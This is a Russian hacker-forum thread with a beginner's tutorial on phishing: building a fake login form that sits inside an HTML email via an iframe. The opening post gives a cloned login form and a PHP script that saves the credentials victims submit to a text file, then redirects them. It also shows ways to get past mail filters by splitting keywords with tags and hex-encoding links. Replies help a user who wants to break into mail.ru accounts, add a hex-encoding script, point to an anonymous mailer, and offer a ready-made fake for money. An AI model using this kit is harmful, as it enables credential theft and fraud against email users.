Создаем окно авторизации внутри письма.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Создаем окно авторизации внутри письма. - 2008-08-18 05:47:41.376666
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
Мануал. Делаем фейк внутри письма.
Cразу говорю, что этот мануал для начинающих. Многие ничего нового для себя не найдут.
Для начала немного теории)
Что такое фейк?
- Фейк - подделка, фальшивка. В данном случае служит для фишинг-атак на пользователей. Пользователь вводит конфиденциальную информацию, думая что она передается сервису, но на самом деле данные отправляются атакующему. Конфиденциальной инфой здесь может быть много чего, от логина и пароля до номера счета и пин-кода кредитки.
Для чего нужен фейк внутри письма?
- Обычно атакующие создают страницу на "левом" сервере, а в письме указывают ссылку на открытку или что-нибудь еще. В последнее время на это мало кто ведется, все уже про подобное знают, поэтому нужно что-нибудь по правдоподобнее)
Вот пример фейка внутри письма:
за предоставленный скрин огромное спасибо abrut3000!
Выглядит внушающи) Разумеется та такой фейк поведется больше юзеров чем на какую-то ссылку. А чем больше жертв - тем лучше нам, значит, будем учиться как делать подобное)
Ну что, с теорией закончили, переходим к практике!
Что там нужно:
1. Страница авторизации.
2. Немного мозга.
3. Основы соц. инженерии.
4. Руки ладошками в разные стороны)
И так, идем на страницу авторизации, жмем view source aka показать исходный код страници.
Ищем строку типа "авторизация" и тд, которая находится в заголовке окна, куда мы вводим логин и пасс.
Выглядит примерно так:
<h3>Авторизация</h3></div><form action="http://"
method="post"><div><input value="set" type="hidden" name="st.posted"><input value="" id="field_redirect"
type="hidden" name="st.redirect"><input value="" id="field_invitation" type="hidden"
name="st.invitation"></div><table cellpadding="4" border="0" cellspacing="4"><tr><td><label for="field_email">E-
mail:</label></td><td><input id="field_email" value="" maxlength="100" type="text" size="25"
name="st.email"> <span style="color: #F00;">*</span></td></tr><tr><td><label
for="field_password">Пароль:</label></td><td><input id="field_password" value="" type="password" size="25"
name="st.password"> <span style="color: #F00;">*</span></td></tr><tr><td> </td><td><input
id="field_remember" type="checkbox" name="st.remember"><label
for="field_remember">запомнить</label></td></tr><tr><td align="center" colspan="2"><input value="Войти"
type="submit" name="button_go"></td></tr><tr><td colspan="2"><a href="">Забыли
пароль?</a></td></tr></table><br><br></form></div></div></div></div>
Выделяем часть сорца, от заголовка, в нашем случае "Авторизация" до "забыли пароль", в общем, последнего что в окне авторизации. Теперь нам нужно отредактить это. Меняем следующее:
<form action="http://" на <form action="login.php"
Там где логин(мыло) меняем поле name=blablabla на name=login
там где пароль меняем поле name=hzhzhz на name=passwd
Сохраняем как index.html, открываем браузером, смотрим чтоб все отображалось красиво и ничем не отличалось от настроящего, если все в норме - едем дальше=)
Теперь нам нужен скрипт записи бд. Так как мы вписали login.php в action, то скрипт должен называться login.php, если же вы вписали что-либо другое, то и скрипт следует переиминовать.)
Код скрипта:
<?PHP
$Login = $_POST['login']; // принемаем логин
$Pass = $_POST['passwd']; // принемаем пароль
$log = fopen("base.txt","a+"); // открываем файл базы данных.
fwrite($log,"\n $Login:$Pass \n"); //записываем полученные данные в базу
fclose($log); //закрываем бд.
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://'></head></html>";//здесь мы можем указать куда будет редирекриться жертва после того, как введет логин и пароль.
?>
?> base.txt - имя файла бд. можно заменить его, но тогда придется переиминовывать соответствующий файл.
Теперь создадим файл base.txt в который будут записываться данные. Заливаем все на хост с поддержкой php.
Теперь нам нужно впихнуть наш фейк в письмо. Нам потребуется любой анонимный мейлер с поддержкой отправки писем в формате html. Пишем наш текст, здесь потребуется знать хоть чуть-чуть соц инженерию. Потом впихиваем следующий код:
<iframe src="http://host.com/index.html" width="ширина" height="высота"></iframe> Где scr=http - адрес хоста с фейком, ширина и высота в пикселях. Я задаю примерно такие параметры:
<iframe src="http://host.com/index.html" width="330" height="180"></iframe> Вы же можете найти размер нужного вам окна авторизации и вписать его параметры.
Теперь сохраняем наш текст в html для теста, открываем в браузере, если все в норме - можно отправлять.
Теперь о блокировании фейков.
Для начала нам нужно определить, как распознаются ссылки на фейки. Чередуя возможные способы их распознавание почтовым сервером.
Существуют следующие типы блокировки:
1) Анализ письма на такие слова как логин, пароль и тд.
2) Анализ ссылки на сходство с ресурсом.
3) Блочит все без разбору)
Теперь, как это можно обойти.
1) Меняем слово пароль на слово па<html>роль, тег html обработается и не отобразится, и слово будет выглядить нормально, но машине его будет сложнее распознать.
2) Шифрование ссылок, например в hex, таким образом ссылка http://site.com/go?to=http://yoursite.ru
будет выглядить так:
http://site.com/go?to=http://%79%6F%75%72%73%69%74%65%2E%72%75
3) Здесь все намного сложнее, если сервис блочит все внешние сайты, то нужно искать на нем сомом возможность создания страници и тд, например, некоторые почтовые сервисы предоставляют услуги хостинга, можно создать на их же сервере страничку фейка, но! Почти все такие хостинги не предоставляют php.
В общем с обходом эксперементируйте, не везде блочит, но в большенстве случаев придется поработать мозгом)
На этом все.
(с)[sm=af.gif]
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 07:38:57.636666
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
Спасиб конечно за статью, но че то я не нахожу строчки : Там где логин(мыло) меняем поле name=blablabla на name=login
там где пароль меняем поле name=hzhzhz на name=passwd
Cкажи где они?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 07:42:55.810000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
Спасиб конечно за статью, но че то я не нахожу строчки : Там где логин(мыло) меняем поле name=blablabla на name=login
там где пароль меняем поле name=hzhzhz на name=passwd
Cкажи где они?
введи в поиск по странице, типа логин или имя пользователя и тд, он тебе переведен на строку типа <form всякая фигня name=login type=text>Логин<дальше теги>
Проще скажи че за сервер, найду тебе строчки нужные)
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 07:44:41.140000
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
Да я твой код взял
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 07:48:38.296666
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
<label for="field_password">Пароль:</label></td><td><input id="field_password" value="" type="password" size="25" name="st.password">
меняем на name=passwd с логином так же, тока меняем на login
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 07:52:32.360000
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
всю строку штоли стирать?
И где там login у меня не находит
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 07:56:54.550000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
всю строку штоли стирать?
И где там login у меня не находит
да ниче не надо стирать…корочь, вот тебе переделанный код…
<label for="field_password">Пароль:</label></td><td><input id="field_password" value="" type="password" size="25" name="passwd">
E-mail:</label></td><td><input id="field_email" value="" maxlength="100" type="text" size="25" name="login">
че тут сложного? О_о
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:12:56.026666
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
Все это понял. Теперь такой вопрос куда вписывать свой сайт?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:13:41.760000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
<iframe src="http://твой сайт" width="ширина" height="высота"></iframe>
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:41:39.253333
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
UP UP UP UP UP
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:46:22.506666
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
Смотри что мне приходит. В чем дело?
буду честен - в кривости рук.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:50:21.146666
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
ну подскажи будь другом я просто в этом не силен
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:51:48.620000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
ну подскажи будь другом я просто в этом не силен
ты фейк какого ресурса делаешь?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 08:53:23.070000
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
mail.ru
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:17:16.830000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
Вот вам авторизация…думаю взломщик контакта в состоянии подстоить под себя.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:23:07.956666
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
а сдесь та куда свой сайт вписывать?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:24:36.990000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
[sm=bj.gif][sm=bj.gif][sm=bj.gif]
ты ваще первый пост видел? йа не имею в виду читал или нет..просто видел хотя бы?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:32:30.866666
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
видел
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:35:45.790000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
видел
ну это заметно.
//вот когда ты его увидел и знаешь его расположение - почитай его повнимательнее.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:37:30.713333
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
ну я просто ноль в этом
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:44:47.653333
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
ну я просто ноль в этом
не похоже
http://forum.xakep.ru/m_1201977/mpage_1/key_/tm.htm#1202070
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:52:24.970000
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
там вконтакте я его не через фейк ломаю. А фейком я хочу почту ломать
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:54:30.986666
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
quote:
ORIGINAL: abrut3000
там вконтакте я его не через фейк ломаю. А фейком я хочу почту ломать
О, тк это биз, сделаю тебе такой готовый фейк мыла за 50 вмз.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-18 09:59:14.910000
|
|
|
abrut3000
Сообщений: 84
Оценки: 0
Присоединился: 2007-11-30 12:31:37.926666
|
упади с дивана
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 10:31:28.913333
|
|
|
FrE
Сообщений: 534
Оценки: 0
Присоединился: 2008-07-19 04:52:02.756666
|
quote:
Шифрование ссылок, например в hex, таким образом ссылка http://site.com/go?to=http://yoursite.ru
будет выглядить так:
http://site.com/go?to=http://%79%6F%75%72%73%69%74%65%2E%72%75
Где и как шифровать? Несовсем понял…
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 10:49:07.890000
|
|
|
FrE
Сообщений: 534
Оценки: 0
Присоединился: 2008-07-19 04:52:02.756666
|
Дайте готовый у кого получилось! У меня суцко данные в base.txt не хочет записывать не в какую!!!
========================================
Всё разобрался…
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 12:23:44.003333
|
|
|
sbxmal
Сообщений: 433
Оценки: 0
Присоединился: 2008-06-12 15:08:08.006666
|
quote:
ORIGINAL: FrE
quote:
Шифрование ссылок, например в hex, таким образом ссылка http://site.com/go?to=http://yoursite.ru
будет выглядить так:
http://site.com/go?to=http://%79%6F%75%72%73%69%74%65%2E%72%75
Где и как шифровать? Несовсем понял…
http://forum.prologic.ws/index.php?showtopic=658
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 12:30:48.193333
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
quote:
ORIGINAL: FrE
quote:
Шифрование ссылок, например в hex, таким образом ссылка http://site.com/go?to=http://yoursite.ru
будет выглядить так:
http://site.com/go?to=http://%79%6F%75%72%73%69%74%65%2E%72%75
Где и как шифровать? Несовсем понял…
Создаем hex.php
<?
$str = urldecode($_SERVER['QUERY_STRING']);
for($i=0;$i<strlen($str);$i++) {
$hex=dechex(ord($str[$i]));
if($str[$i]=='&')
echo "$str[$i]";
else
echo "%$hex";
}
?>
Заливаем.
Используем так: http://site.ru/hex.php?hex.php
Выход: %68%65%78%2e%70%68%70
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 14:15:30.470000
|
|
|
FrE
Сообщений: 534
Оценки: 0
Присоединился: 2008-07-19 04:52:02.756666
|
От куда щяс можно послать письмо анонимно в ХТМЛ??? Даже в гугле нечего не нарыл рабочего! Есть но только без ХТМЛ
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 22:03:49.393333
|
|
|
FrE
Сообщений: 534
Оценки: 0
Присоединился: 2008-07-19 04:52:02.756666
|
quote:
ORIGINAL: sbxmal
quote:
ORIGINAL: FrE
quote:
Шифрование ссылок, например в hex, таким образом ссылка http://site.com/go?to=http://yoursite.ru
будет выглядить так:
http://site.com/go?to=http://%79%6F%75%72%73%69%74%65%2E%72%75
Где и как шифровать? Несовсем понял…
http://forum.prologic.ws/index.php?showtopic=658
Ну и как ей пользоватся можешь подсказать?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-19 23:08:39.840000
|
|
|
Viper[o_O]k
Сообщений: 163
Оценки: 0
Присоединился: 2008-08-16 09:31:45.666666
|
Поскажите сервис анонимной отправки в html.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 00:04:00.063333
|
|
|
FrE
Сообщений: 534
Оценки: 0
Присоединился: 2008-07-19 04:52:02.756666
|
Ну и? И как правильно присоединить ето к ссылке?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 00:10:33.736666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Страшно жить.. то что вы шифруете и есть ссылка. Не бойтесь браузер адекватно её воспримет.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 00:14:25.030000
|
|
|
sbxmal
Сообщений: 433
Оценки: 0
Присоединился: 2008-06-12 15:08:08.006666
|
quote:
Ну и? И как правильно присоединить ето к ссылке?
Как верно сказал хPurg3n
quote:
то что вы шифруете и есть ссылка. Не бойтесь браузер адекватно её воспримет.
видишь ли что получается :
http://yoursite.ru
и
http://%79%6F%75%72%73%69%74%65%2E%72%75
идем туда же…
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 05:38:54.620000
|
|
|
FrE
Сообщений: 534
Оценки: 0
Присоединился: 2008-07-19 04:52:02.756666
|
quote:
ORIGINAL: sbxmal
quote:
Ну и? И как правильно присоединить ето к ссылке?
Как верно сказал хPurg3n
quote:
то что вы шифруете и есть ссылка. Не бойтесь браузер адекватно её воспримет.
видишь ли что получается :
http://yoursite.ru
и
http://%79%6F%75%72%73%69%74%65%2E%72%75
идем туда же…
Спасибо за помощь:)
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 10:19:16.930000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
quote:
ORIGINAL: aSich
Поскажите сервис анонимной отправки в html.
http://never-mind.ru/sendmail/index.php?
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 15:40:16.926666
|
|
|
FOXyara
Сообщений: 141
Оценки: 0
Присоединился: 2006-09-23 03:07:09.976666
|
Хахаха, кто там такой тупой ?)
Даже Я всё понял.
|
|
|
|
|
RE: Создаем окно авторизации внутри письма. - 2008-08-20 15:46:50.570000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: FOXyara
Хахаха, кто там такой тупой ?)
Даже Я всё понял.
Както эта фраза самокритично звучит :D
|
|
|
|
|
|
" alt="" />
